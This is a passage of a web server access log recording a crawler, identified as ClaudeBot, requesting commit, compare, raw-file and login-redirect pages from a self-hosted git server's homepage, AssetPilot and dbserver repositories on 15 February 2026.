like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fmail_contact.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fletsencrypt%2Frenewal%2Fnpm-6.conf" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fletsencrypt%2Frenewal%2Fnpm-1.conf" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf?display=rendered" [Client 216.73.216.188] [Length 11218] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 22963] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf?display=rendered" [Client 216.73.216.188] [Length 11221] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fletsencrypt%2Frenewal%2Fnpm-7.conf" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 216.73.216.188] [Length 11179] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fletsencrypt%2Frenewal%2Fnpm-4.conf" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fletsencrypt%2Frenewal" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf?display=rendered" [Client 216.73.216.188] [Length 11220] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fletsencrypt%2Frenewal%2Fnpm-2.conf" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf?display=rendered" [Client 216.73.216.188] [Length 11219] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Ffind%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt/renewal/npm-6.conf" [Client 216.73.216.188] [Length 9852] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/letsencrypt/renewal/npm-6.conf" [Client 216.73.216.188] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 11122] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/letsencrypt/renewal/npm-6.conf" [Client 216.73.216.188] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt/renewal/npm-1.conf" [Client 216.73.216.188] [Length 9850] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/letsencrypt/renewal/npm-1.conf" [Client 216.73.216.188] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 9830] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/letsencrypt/renewal/npm-1.conf" [Client 216.73.216.188] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 955] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fletsencrypt%2Frenewal%2Fnpm-6.conf" [Client 216.73.216.188] [Length 22453] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fletsencrypt%2Frenewal%2Fnpm-1.conf" [Client 216.73.216.188] [Length 22442] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 441680] [Gzip 15.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" [Client 216.73.216.188] [Length 4132] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" [Client 216.73.216.188] [Length 10142] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md?display=rendered" [Client 216.73.216.188] [Length 13812] [Gzip 2.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.Notebook%2FNuget%EC%97%90+OPC+UA+%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 216.73.216.188] [Length 23758] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md?display=source" [Client 216.73.216.188] [Length 15357] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.Notebook%2Fubuntu+%EC%84%9C%EB%B2%84+%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 216.73.216.188] [Length 21244] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.Notebook%2F%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80+%EC%B2%B4%ED%81%AC+by+claude.md" [Client 216.73.216.188] [Length 27659] [Gzip 6.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2F%ED%95%84%EC%9A%94+Linux%EB%AA%85%EB%A0%B9%EB%93%A4+%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 25118] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?files=.TemporaryDocument%2F%ED%95%84%EC%9A%94+Linux%EB%AA%85%EB%A0%B9%EB%93%A4+%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 17072] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 2167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 216.73.216.188] [Length 12577] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 10522] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 216.73.216.188] [Length 12223] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 10325] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2F.Notebook%2FBRIN%2520%25EC%2584%25A4%25EB%25AA%2585.md" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 216.73.216.188] [Length 11028] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 216.73.216.188] [Length 13336] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 216.73.216.188] [Length 12833] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 388222] [Gzip 13.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?files=.TemporaryDocument%2F%ED%95%84%EC%9A%94+Linux%EB%AA%85%EB%A0%B9%EB%93%A4+%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 17198] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 388209] [Gzip 13.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 387844] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 22948] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 387832] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 442130] [Gzip 15.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 442146] [Gzip 15.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 441723] [Gzip 15.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11626] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json?display=source" [Client 216.73.216.188] [Length 11068] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2Finit_db.py" [Client 216.73.216.188] [Length 29656] [Gzip 5.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:11:00:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:11:00:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:11:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" [Client 216.73.216.188] [Length 10694] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:11:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" [Client 216.73.216.188] 